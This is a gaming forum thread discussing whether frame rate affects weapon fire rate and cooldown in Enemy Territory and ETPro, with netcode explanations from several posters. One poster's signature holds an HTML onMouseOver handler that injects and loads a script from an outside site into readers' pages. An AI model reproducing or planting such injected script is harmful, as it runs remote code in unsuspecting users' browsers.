Independant Physics FPS

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

MeeZ

Independant Physics FPS

Post by MeeZ »

I was wondering about this command when an argument about people with higher FPS in ET can shoot just that little bit faster, due to the netcode. Then I thought about Independant Physics, and was wondering... Does Independant Physics only change stuff like jumping/moving, or does it fix the annoying disadvantage of having a slow computer?

And if it doesn't, Would this be possible to be implemented?

Respectfully, MeeZ
Meez
#eat - Quakenet
#necromantia - Quakenet
fretn

Re: Independant Physics FPS

Post by fretn »

MeeZ wrote:higher FPS in ET can shoot just that little bit faster
:?:
Day by day : http://w.twwwo.be/
MeeZ

Post by MeeZ »

For Example:

333FPS fires faster than 43FPS

But im wondering, If independentphysics was set, would it act like both were firing at XXFPS, Or would it be the same?
Meez
#eat - Quakenet
#necromantia - Quakenet
KingJackaL

Post by KingJackaL »

MeeZ wrote:333FPS fires faster than 43FPS
Got any proof?

Because when bullets come out of your gun isn't decided by you - it's decided by the server. You just send to the server 'I held down +attack from NOW... until... NOW', and the server decides what that means for when bullets spawn, how many etc.

...unless something in the system is a whole lot more fubar than I though :?
gotenks

Post by gotenks »

someone on et.com forums was saying that they had the no-no variable set (can't remember the var right now, but it's the one that messes up alot of things including making the sniper fire after the recoil) and he was running 333fps and he said he timed it with someone running 43fps and emptied his clip while the other guy had 10 bullets left
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
ReyalP

Post by ReyalP »

KingJackaL wrote:
...unless something in the system is a whole lot more fubar than I though :?
In ETmain, there is some framerate dependancy for fire and cooling rates. I thought this was already fixed in etpro, but I haven't actually tested it.

The cooldown thing is the easiest to see, just set your com_maxfps to various values, and fire an mg42 until it overheats. The number of shots fired will be different.

edit:
Note there is or was also the pmove_fixed + 333 fps thing that cropped up with etpro.

edit #2:
http://bani.anime.net/banimod/forums/vi ... hlight=fps

edit #3:
http://bani.anime.net/banimod/forums/vi ... d+speedhax
send lawyers, guns and money
Spark2

Post by Spark2 »

KingJackaL wrote:
MeeZ wrote:333FPS fires faster than 43FPS
Got any proof?

Because when bullets come out of your gun isn't decided by you - it's decided by the server. You just send to the server 'I held down +attack from NOW... until... NOW', and the server decides what that means for when bullets spawn, how many etc.
[Edited because my original posting was probably wrong]
ET still runs each clientframe on the server, so it's not completely FPS independant. However, that's usually not a problem because the fastest gun (the MG) shoots every 50ms, which is equal to 20 FPS. As long as you don't get less than 20 FPS, you should be fine.
There is only one little detail which can cause guns to shoot slightly slower with low FPS: Between each shot, the client waits X number of frames until the weapon delay time has passed. If your last frame took longer than neccessary, then this "extra time" is lost. So if you get 20 FPS, the delay between each SMG shot (should be 150ms) can actually be anything from 150 to 200ms. If you get 40 FPS, then it will be 150 to 175ms, etc. So the higher your FPS, the closer you'll be to an "ideal" firing rate by average, but the difference is really small. This also applies to the "first shot" delay of each gun.
The other problems, for example the bug at 333 FPS should be all fixed by ETPro.
Rain

Post by Rain »

Spark2 wrote:[Edited because my original posting was probably wrong]
ET still runs each clientframe on the server, so it's not completely FPS independant. However, that's usually not a problem because the fastest gun (the MG) shoots every 50ms, which is equal to 20 FPS. As long as you don't get less than 20 FPS, you should be fine.
The server will always run your client as if it sent at least 20 commands/second, even if it sends less (well, only 15 in etmain, but I fixed that somewhere along the line.) This is done entirely in Pmove(), similarly to the way pmove_fixed behaves. (Look for the msec > 66 bit.)

You may be right on the other bits, though, because weaponTime is clamped to 0 if it goes below... A player with higher frame times could get cheated slightly in that situation.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
MeeZ

Post by MeeZ »

So us with crappy computers get a disadvantage or not?

Some of this source code related jargon is kinda hard to understand for a 12 year old :x
Meez
#eat - Quakenet
#necromantia - Quakenet
gotenks

Post by gotenks »

from what i understand, in etpro 3.0+ most of the etmain bugs that gave you any major advantage have been fixed... you may get a small rof increase when getting 333fps, but shouldn't really be noticeable... and pmove_fixed should NEVER be set in etpro
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
next_ghost

Post by next_ghost »

I never found any problem with mobile MG42 but I can fire my SMG/rifle faster than any emplaced/mounted MG when I go under 30fps.

When I have good framerate, I can kill with emplaced/mounted MG in less than 0.5 seconds. When I have really bad framerate, I can barely make it alive after 5 seconds long gunfight.